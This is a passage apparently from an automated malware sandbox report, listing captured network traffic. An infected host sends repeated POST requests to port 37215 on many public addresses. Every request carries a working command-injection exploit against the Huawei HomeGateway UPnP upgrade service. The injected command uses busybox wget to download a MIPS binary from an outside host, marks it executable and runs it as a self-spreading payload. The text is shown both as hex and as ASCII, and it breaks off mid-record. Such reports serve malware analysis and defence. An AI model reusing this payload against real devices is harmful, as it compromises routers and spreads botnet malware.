                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2028192.168.2.133791441.62.187.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574722052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2029192.168.2.1354532157.76.138.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574724913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2030192.168.2.1339808157.32.72.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574739933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2031192.168.2.135231441.181.171.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.574745893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2032192.168.2.1342598197.251.15.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575149059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2033192.168.2.1360490197.53.187.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575149059 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2034192.168.2.1355188157.123.115.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575170994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2035192.168.2.1336230157.229.97.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575189114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2036192.168.2.1346872172.97.43.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575192928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2037192.168.2.1341530197.231.209.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.575192928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 